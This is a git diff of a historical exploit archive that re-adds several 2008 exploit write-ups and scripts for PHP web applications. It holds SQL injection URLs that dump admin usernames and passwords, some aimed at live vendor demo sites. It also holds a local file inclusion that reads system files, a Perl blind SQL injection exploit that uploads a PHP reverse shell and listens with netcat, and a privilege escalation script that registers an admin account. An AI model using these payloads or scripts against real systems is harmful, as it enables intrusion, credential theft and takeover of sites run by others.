darkangel_g85[at]Yahoo[DoT]com = +# hussin.x[at]hotmail[DoT]com = +# = 
+#======================================================== +# HomE script : http://www.phpauction.net +# +# Demo : http://www.phpauction.net/phpauction-gpl-3.2/ +# +# +# DorK : Copyright 2007, PHPAUCTION.NET +# +# +########################################################## + +Exploit: + + +http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers-- + + + +L!VE DEMO: + +http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers-- + + +LogiN: + +admin/index.php + + +################################################################################ +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # +# Silic0n / Rafi / FAHD / Iraqihack # +# # +#################################(and All IRAQIs)############################### +################################################################################ + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5893.txt b/platforms/php/webapps/5893.txt index a02aa4de7..2a6f57963 100755 --- a/platforms/php/webapps/5893.txt +++ b/platforms/php/webapps/5893.txt 
@@ -1,21 +1,21 @@ -/---------------------------------------------------------------\ -\ / -/ Joomla Component expshop Remote SQL injection \ -\ / -\---------------------------------------------------------------/ - - -[*] Author : His0k4 [ALGERIAN HaCkEr] - -[*] Dork : inurl:com_expshop - -[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL} - -[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- - - ----------------------------------------------------------------------------- -[*] Greetings : All friends & muslims HaCkeRs... -[*] Greetings2: http://palcastle.org/cc - -# milw0rm.com [2008-06-22] +/---------------------------------------------------------------\ +\ / +/ Joomla Component expshop Remote SQL injection \ +\ / +\---------------------------------------------------------------/ + + +[*] Author : His0k4 [ALGERIAN HaCkEr] + +[*] Dork : inurl:com_expshop + +[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL} + +[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- + + +---------------------------------------------------------------------------- +[*] Greetings : All friends & muslims HaCkeRs... +[*] Greetings2: http://palcastle.org/cc + +# milw0rm.com [2008-06-22] diff --git a/platforms/php/webapps/5895.txt b/platforms/php/webapps/5895.txt index 23ec3bbb3..d37523e32 100755 --- a/platforms/php/webapps/5895.txt +++ b/platforms/php/webapps/5895.txt 
@@ -1,53 +1,53 @@ -Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability - -================================================================ - -[+] Author : KnocKout -[+] Special Thankz : Dr.Kacak -[+] System 0VerfL0verZ - -================================================================= - -Script : sHibby sHop -Verz: 2.2 -Download : http://aspindir.com/goster/4476 - - - -SQL attack ; - -http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar - -Tables; - -yasakli -ustmenu -urun_yorum -urun -ureticiler -tema -site_gel -siparis -sayfa -say_site -say_ip -say_hit -online -kategori -banner -ayarlar - - ------------ - - Update file ( Direct Access ) - - http://localsite.com/path/upgrade.asp - - -And default Database file - -http://target.com/path/Db/urun.mdb - -############################################################### - -# milw0rm.com [2008-06-22] +Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability + +================================================================ + +[+] Author : KnocKout +[+] Special Thankz : Dr.Kacak +[+] System 0VerfL0verZ + +================================================================= + +Script : sHibby sHop +Verz: 2.2 +Download : http://aspindir.com/goster/4476 + + + +SQL attack ; + +http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar + +Tables; + +yasakli +ustmenu +urun_yorum +urun +ureticiler +tema +site_gel +siparis +sayfa +say_site +say_ip +say_hit +online +kategori +banner +ayarlar + + ------------ + + Update file ( Direct Access ) + + http://localsite.com/path/upgrade.asp + + +And default Database file + +http://target.com/path/Db/urun.mdb + +############################################################### + +# milw0rm.com [2008-06-22] diff --git a/platforms/php/webapps/5896.txt b/platforms/php/webapps/5896.txt index 63ee85cf3..cdf718706 100755 --- a/platforms/php/webapps/5896.txt 
+++ b/platforms/php/webapps/5896.txt 
@@ -1,83 +1,83 @@ -===================================================== - CMS Mini 0.2.2 Local File Inclusion Vulnerability -===================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 22 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : CMS Mini - VERSION : 0.2.2 - VENDOR : http://www.cmsmini.it/ - DOWNLOAD : http://downloads.sourceforge.net/cmsmini -##################################################### - ---- Local File Inclusion --- - ----------------------------- - Vulnerable File [view/index.php] ----------------------------- - -@Line 5 - - 20: if( !is_dir('../pages') ) header("location: ../admin/login.php"); - 21: - 22: $path = $_GET['path']; - 23: $p = $_GET['p']; - 24: $msg = $_GET['msg']; - 25: $pext = strrchr($p, '.'); - 26: if( $path ) - 27: $dirpath = '../pages/'.$path; - 28: else - 29: $dirpath = '../pages'; - - ---------- - Exploit ---------- -[+] http://[Target]/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html -[+] http://[Target]/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html - - This exploit will open boot.ini in system file: - -[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - - You can change boot.ini to /etc/passwd%00 in linux OS. 
- -------------- - POC Exploit -------------- - -[+] GET http://192.168.24.25/cmsmini/view/?path=../../../../../../../../../../boot.ini%00&p=index.html HTTP/1.1 -[+] Host: 192.168.24.25 -[+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 -[+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -[+] Accept-Language: en-us,en;q=0.5 -[+] Accept-Encoding: gzip,deflate -[+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -[+] Keep-Alive: 300 -[+] Proxy-Connection: keep-alive - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-22] +===================================================== + CMS Mini 0.2.2 Local File Inclusion Vulnerability +===================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 22 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : CMS Mini + VERSION : 0.2.2 + VENDOR : http://www.cmsmini.it/ + DOWNLOAD : http://downloads.sourceforge.net/cmsmini +##################################################### + +--- Local File Inclusion --- + +---------------------------- + Vulnerable File [view/index.php] +---------------------------- + +@Line 5 + + 20: if( !is_dir('../pages') ) header("location: ../admin/login.php"); + 21: + 22: $path = $_GET['path']; + 23: $p = $_GET['p']; + 24: $msg = $_GET['msg']; + 25: $pext = strrchr($p, '.'); + 26: if( $path ) + 27: $dirpath = '../pages/'.$path; + 28: else + 29: $dirpath = '../pages'; + + +--------- + Exploit +--------- +[+] http://[Target]/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html +[+] http://[Target]/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html + + This exploit will open boot.ini in system file: + +[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect + + You can change boot.ini to /etc/passwd%00 in linux OS. 
+ +------------- + POC Exploit +------------- + +[+] GET http://192.168.24.25/cmsmini/view/?path=../../../../../../../../../../boot.ini%00&p=index.html HTTP/1.1 +[+] Host: 192.168.24.25 +[+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 +[+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +[+] Accept-Language: en-us,en;q=0.5 +[+] Accept-Encoding: gzip,deflate +[+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +[+] Keep-Alive: 300 +[+] Proxy-Connection: keep-alive + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-22] diff --git a/platforms/php/webapps/5898.pl b/platforms/php/webapps/5898.pl index 99accfc34..25475e962 100755 --- a/platforms/php/webapps/5898.pl +++ b/platforms/php/webapps/5898.pl 
@@ -1,216 +1,216 @@ -#!/usr/bin/perl -# -# 05/18/2008 - IGSuite 3.2.4 Blind SQL Injection - k`sOSe -# -# 05/21/2008 - Vendor notified -# 05/23/2008 - A patch was pushed via the igsuited daemon(not enabled by default) -# Fix: run igsuited --update-igsuite or upgrade to 3.2.5-beta. -# -# Tested on IGSuite 3.2.4 on linux with MySQL, needs nc(in path). -# Drops a reverse shell, use http://pentestmonkey.net/tools/php-reverse-shell/ -# -# -# cohelet ~ # ./igsploit.pl localhost /cgi-bin / ./php-reverse-shell.php 1234 -# IGSploit 0.1 - k`sOSe -# -# [*] Abusing blind SQL injection: ksose=qwerty -# [*] Logging in with username `ksose', password `qwerty'... -# [I] Found `formid' -> 12141384631aX7I -# [I] Logged in! -# [*] Uploading shell.. -# [I] Found `formid' -> 1214138463vOl5x -# [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here... -# listening on [any] 1234 ... -# connect to [127.0.0.1] from localhost [127.0.0.1] 44758 -# Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux -# 14:41:05 up 1 day, 2:52, 1 user, load average: 0.51, 0.34, 0.52 -# USER TTY LOGIN@ IDLE JCPU PCPU WHAT -# root tty1 Sat11 21:33m 0.84s 0.02s /bin/login -- -# uid=81(apache) gid=81(apache) groups=81(apache) -# sh: no job control in this shell -# sh-3.2$ - -use warnings; -use strict; - -print "IGSploit 0.1 - k`sOSe\n\n"; -usage() unless(@ARGV>2); - - -use POSIX; -use LWP::UserAgent; -use HTTP::Cookies; - -my $ighost = $ARGV[0]; -my $igcgi = $ARGV[1]; -my $igpath = $ARGV[2]; -my $evilfile = $ARGV[3]; -my $rport = $ARGV[4]; -my $igurl = 'http://' . $ighost . 
$igcgi; -my @chars = ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' ); - -my $count = 1; -my $string = ''; - -my $ua = LWP::UserAgent->new; $ua->agent( "Mozilla/5.0" ); -$ua->cookie_jar( HTTP::Cookies->new( ) ); -$ua->timeout(5); - - - -print "[*] Abusing blind SQL injection: "; -$|=1; -while(1) -{ - for my $char( @chars ) - { - if( defined( my $found = check_char( $count, $char ) ) ) - { - if( $found eq '' ) - { - upload_shell( split( '=', $string ) ); - exit; - } - $string .= $found; - $count++; - last; - } - } -} - -sub upload_shell -{ - my ($username, $password) = @_; - - print "[*] Logging in with username `$username', password `$password'...\n"; - do_login( $username, $password ); - - - print "[*] Uploading shell..\n"; - my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content ); - my $res = $ua->post( "$igurl/filemanager", - Content_Type => 'multipart/form-data', - Content => [ - formid => [undef, undef, Content => $formid], - upfile => [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)], - newfilename => [undef, undef, Content => $evilfile], - submit8 => [undef, undef, Content => 'Conferma'], - ] - ); - - - if(qx(which nc 2>&1) !~ /^which:/) - { - print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n"; - - my $pid = fork(); - if($pid) - { - sleep 2; - my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] ); - - if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/) - { - print "\n[W] Unexpected status code received -> " . $res->status_line . "\n"; - } - - waitpid($pid, 0); - } - else - { - exec("`which nc` -v -l -p $rport"); - } - } - else - { - print "[W] Can't find netcat!\n"; - print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . 
", start your listener on port $rport and wget it\n"; - } -} - -sub do_login -{ - my ($username, $password) = @_; - - my $formid = get_formid($ua->get( "$igurl/igsuite" )->content); - - my $res = $ua->post( "$igurl/igsuite", - { - formid => $formid, - login => $username, - pwd => $password, - submit5 => 'Accedi', - }); - die( "Can't login\n" ) - if( $res->content !~ /this application need a browser that support multi frame/ ); - - # lies - print "[I] Logged in!\n"; - - return $formid; -} - -sub get_formid -{ - my ($content) = @_; - - die( "Can't find formid value\n" ) - unless $content =~ /name="formid"\s+value="(.+?)"/; - - print "[I] Found `formid' -> $1\n"; - - return $1; -} - -sub slurp -{ - return do { - open(my $f, "<$_[0]") or die("opening `$_[0]': $!"); - local $/; - my $s=<$f>; - close $f; - $s - }; -} - -sub check_char -{ - my ($count, $char) = @_; - - my $res = $ua->post( "$igurl/igsuite", - { - formid => "1' OR (SELECT ". - "MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ". - "FROM `users` LIMIT 0,1) = '$char", - }); - die ("Error: " . $res->status_line . "\n") unless ( $res->is_success ); - - if($res->content =~ /IGSuite Error/) - { - print "\b$char"; - return undef; - } - elsif($res->status_line =~ /^(2\d+|3\d+)/) - { - print "\b$char "; - print "\n" if ($char eq ''); - return $char; - } - else - { - print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n"; - die("[!] Failed, check cgi/docroot path."); - } -} - -sub usage -{ - die < 12141384631aX7I +# [I] Logged in! +# [*] Uploading shell.. +# [I] Found `formid' -> 1214138463vOl5x +# [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here... +# listening on [any] 1234 ... 
+# connect to [127.0.0.1] from localhost [127.0.0.1] 44758 +# Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux +# 14:41:05 up 1 day, 2:52, 1 user, load average: 0.51, 0.34, 0.52 +# USER TTY LOGIN@ IDLE JCPU PCPU WHAT +# root tty1 Sat11 21:33m 0.84s 0.02s /bin/login -- +# uid=81(apache) gid=81(apache) groups=81(apache) +# sh: no job control in this shell +# sh-3.2$ + +use warnings; +use strict; + +print "IGSploit 0.1 - k`sOSe\n\n"; +usage() unless(@ARGV>2); + + +use POSIX; +use LWP::UserAgent; +use HTTP::Cookies; + +my $ighost = $ARGV[0]; +my $igcgi = $ARGV[1]; +my $igpath = $ARGV[2]; +my $evilfile = $ARGV[3]; +my $rport = $ARGV[4]; +my $igurl = 'http://' . $ighost . $igcgi; +my @chars = ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' ); + +my $count = 1; +my $string = ''; + +my $ua = LWP::UserAgent->new; $ua->agent( "Mozilla/5.0" ); +$ua->cookie_jar( HTTP::Cookies->new( ) ); +$ua->timeout(5); + + + +print "[*] Abusing blind SQL injection: "; +$|=1; +while(1) +{ + for my $char( @chars ) + { + if( defined( my $found = check_char( $count, $char ) ) ) + { + if( $found eq '' ) + { + upload_shell( split( '=', $string ) ); + exit; + } + $string .= $found; + $count++; + last; + } + } +} + +sub upload_shell +{ + my ($username, $password) = @_; + + print "[*] Logging in with username `$username', password `$password'...\n"; + do_login( $username, $password ); + + + print "[*] Uploading shell..\n"; + my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content ); + my $res = $ua->post( "$igurl/filemanager", + Content_Type => 'multipart/form-data', + Content => [ + formid => [undef, undef, Content => $formid], + upfile => [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)], + newfilename => [undef, undef, Content => $evilfile], + submit8 => [undef, 
undef, Content => 'Conferma'], + ] + ); + + + if(qx(which nc 2>&1) !~ /^which:/) + { + print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n"; + + my $pid = fork(); + if($pid) + { + sleep 2; + my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] ); + + if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/) + { + print "\n[W] Unexpected status code received -> " . $res->status_line . "\n"; + } + + waitpid($pid, 0); + } + else + { + exec("`which nc` -v -l -p $rport"); + } + } + else + { + print "[W] Can't find netcat!\n"; + print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . ", start your listener on port $rport and wget it\n"; + } +} + +sub do_login +{ + my ($username, $password) = @_; + + my $formid = get_formid($ua->get( "$igurl/igsuite" )->content); + + my $res = $ua->post( "$igurl/igsuite", + { + formid => $formid, + login => $username, + pwd => $password, + submit5 => 'Accedi', + }); + die( "Can't login\n" ) + if( $res->content !~ /this application need a browser that support multi frame/ ); + + # lies + print "[I] Logged in!\n"; + + return $formid; +} + +sub get_formid +{ + my ($content) = @_; + + die( "Can't find formid value\n" ) + unless $content =~ /name="formid"\s+value="(.+?)"/; + + print "[I] Found `formid' -> $1\n"; + + return $1; +} + +sub slurp +{ + return do { + open(my $f, "<$_[0]") or die("opening `$_[0]': $!"); + local $/; + my $s=<$f>; + close $f; + $s + }; +} + +sub check_char +{ + my ($count, $char) = @_; + + my $res = $ua->post( "$igurl/igsuite", + { + formid => "1' OR (SELECT ". + "MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ". + "FROM `users` LIMIT 0,1) = '$char", + }); + die ("Error: " . $res->status_line . 
"\n") unless ( $res->is_success ); + + if($res->content =~ /IGSuite Error/) + { + print "\b$char"; + return undef; + } + elsif($res->status_line =~ /^(2\d+|3\d+)/) + { + print "\b$char "; + print "\n" if ($char eq ''); + return $char; + } + else + { + print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n"; + die("[!] Failed, check cgi/docroot path."); + } +} + +sub usage +{ + die < - -system('cls'); -#system('clear'); - -use LWP::UserAgent; -use HTTP::Request::Common; - -$site = $ARGV[0]; -$user = $ARGV[1]; -$pass = $ARGV[2]; -$mail = $ARGV[3]; - - print " -------------------------------------------------\n"; - print " BlogPHP 2.0 Remote Privilege Escalation Exploit \n"; - print " Powered by Cod3rZ \n"; - print " http://cod3rz.helloweb.eu \n"; - print " -------------------------------------------------\n"; - -sub usage { - print " Usage: perl bp.pl \n"; - print " -------------------------------------------------\n"; -} - if(!$mail) { &usage; } - else { - if ($site !~ /http:\/\//) { $site = "http://".$site; } - - print " Site: $site \n"; - print " User: $user \n"; - print " Pass: $pass \n"; - print " Mail: $mail \n"; - print " -------------------------------------------------\n"; - print " Please Wait \n"; - print " -------------------------------------------------\n"; - - $ua = LWP::UserAgent->new; - $lwp = $ua->request(POST $site.'index.php?act=register2', - [ username => $user, password => $pass, email => $mail."','Admin','','','','','','','','','','','','')/*" ]); - - if($lwp->content =~ /Your now registered and logged in/) { - print " Done. Now you're admin \n"; - print " -------------------------------------------------\n"; - } - else { - print " Failed. 
\n"; - print " -------------------------------------------------\n"; - } - -} - -# milw0rm.com [2008-06-23] +#!/usr/bin/perl +# BlogPHP 2.0 Remote Privilege Escalation Exploit +# Author : Cod3rZ +# Site : http://cod3rz.helloweb.eu +# Site : http://devilsnight.altervista.org +# Cuz We Back Rude This Time +# +# Privilege Escalation +# Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with: +# username=[yourusername]&password=[yourpass]&email=[yourmail]','Admin','','','','','','','','','','','','')/* +# +# There are other bugs, find them yourself +# +# Usage: perl bp.pl + +system('cls'); +#system('clear'); + +use LWP::UserAgent; +use HTTP::Request::Common; + +$site = $ARGV[0]; +$user = $ARGV[1]; +$pass = $ARGV[2]; +$mail = $ARGV[3]; + + print " -------------------------------------------------\n"; + print " BlogPHP 2.0 Remote Privilege Escalation Exploit \n"; + print " Powered by Cod3rZ \n"; + print " http://cod3rz.helloweb.eu \n"; + print " -------------------------------------------------\n"; + +sub usage { + print " Usage: perl bp.pl \n"; + print " -------------------------------------------------\n"; +} + if(!$mail) { &usage; } + else { + if ($site !~ /http:\/\//) { $site = "http://".$site; } + + print " Site: $site \n"; + print " User: $user \n"; + print " Pass: $pass \n"; + print " Mail: $mail \n"; + print " -------------------------------------------------\n"; + print " Please Wait \n"; + print " -------------------------------------------------\n"; + + $ua = LWP::UserAgent->new; + $lwp = $ua->request(POST $site.'index.php?act=register2', + [ username => $user, password => $pass, email => $mail."','Admin','','','','','','','','','','','','')/*" ]); + + if($lwp->content =~ /Your now registered and logged in/) { + print " Done. Now you're admin \n"; + print " -------------------------------------------------\n"; + } + else { + print " Failed. 
\n"; + print " -------------------------------------------------\n"; + } + +} + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5910.txt b/platforms/php/webapps/5910.txt index 6ea92fc70..892bb8884 100755 --- a/platforms/php/webapps/5910.txt +++ b/platforms/php/webapps/5910.txt 
@@ -1,49 +1,49 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## Ready2Edit ( pages.php menuid ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM -## -## Em@il : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : Ready2Edit -## -## site : www.skylinewebnapps.com -## -######################## -######################## -## -## -(:: SQL ::)- -## -## www.site.com/ -## pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/* -## -## -(:: L!VE DeMo ::)- -## -## http://demo.skylinewebnapps.com/Ready2Edit/pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/* -## -####################### -####################### - -####################################################################################################### -####################################################################################################### - - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-23] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## Ready2Edit ( pages.php menuid ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM +## +## Em@il : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : Ready2Edit +## +## site : www.skylinewebnapps.com +## +######################## +######################## +## +## -(:: SQL ::)- +## +## www.site.com/ +## pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/* +## +## -(:: L!VE DeMo ::)- +## +## http://demo.skylinewebnapps.com/Ready2Edit/pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/* +## +####################### +####################### + +####################################################################################################### +####################################################################################################### + + -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5911.txt b/platforms/php/webapps/5911.txt index 3be1fe5d9..5de88032b 100755 --- a/platforms/php/webapps/5911.txt +++ b/platforms/php/webapps/5911.txt 
@@ -1,38 +1,38 @@ - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################ - # [ researchguide ] Remote SQL Injection Vulnerability # - ################################################################ - # - # Script site: http://researchguide.sourceforge.net/ - # http://sourceforge.net/projects/researchguide/ - # - # - # Vuln: http://site.com/guide/guide.php?id=-1+UNION+SELECT+1,2,concat_ws(char(58),id,name,uniqname,email),4,5,6,7,8,9%20from%20selector/* - # - # - # Bug: - # - # ... - # $query = "SELECT * FROM $guideTable WHERE id=$id"; - # - # $result = mysql_query ($query) - # or die ('The query failed!'); - # ... - # - ######################################################## - # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz.. # - ######################################################## - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-06-23] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################ + # [ researchguide ] Remote SQL Injection Vulnerability # + ################################################################ + # + # Script site: http://researchguide.sourceforge.net/ + # http://sourceforge.net/projects/researchguide/ + # + # + # Vuln: http://site.com/guide/guide.php?id=-1+UNION+SELECT+1,2,concat_ws(char(58),id,name,uniqname,email),4,5,6,7,8,9%20from%20selector/* + # + # + # Bug: + # + # ... 
+ # $query = "SELECT * FROM $guideTable WHERE id=$id"; + # + # $result = mysql_query ($query) + # or die ('The query failed!'); + # ... + # + ######################################################## + # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz.. # + ######################################################## + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5913.txt b/platforms/php/webapps/5913.txt index bb8b6a15e..7e205f4d0 100755 --- a/platforms/php/webapps/5913.txt +++ b/platforms/php/webapps/5913.txt 
@@ -1,67 +1,67 @@ -===================================================================================== - MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities -===================================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 23 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : MyBlog: PHP and MySQL Blog/CMS software - DOWNLOAD : http://downloads.sourceforge.net/myblog -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ----------- - Exploits ----------- - -[+] http://[Target]/os/index.php?view=[SQL Injection] -[+] http://[Target]/os/member.php?id=[SQL Injection] -[+] http://[Target]/os/post.php?id=[SQL Injection] - - **This exploits can get username and password (No Encryption)** - --------------- - POC Exploits --------------- - -[+] http://192.168.24.25/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1 -[+] http://192.168.24.25/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1 -[+] http://192.168.24.25/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1 - - - ---- Remote XSS --- - ----------- - Exploits ----------- - -[+] http://[Target]/os/index.php?s=[XSS] -[+] http://[Target]/os/index.php?sort=[XSS] -[+] http://[Target]/os/post.php?id=[XSS] - - 
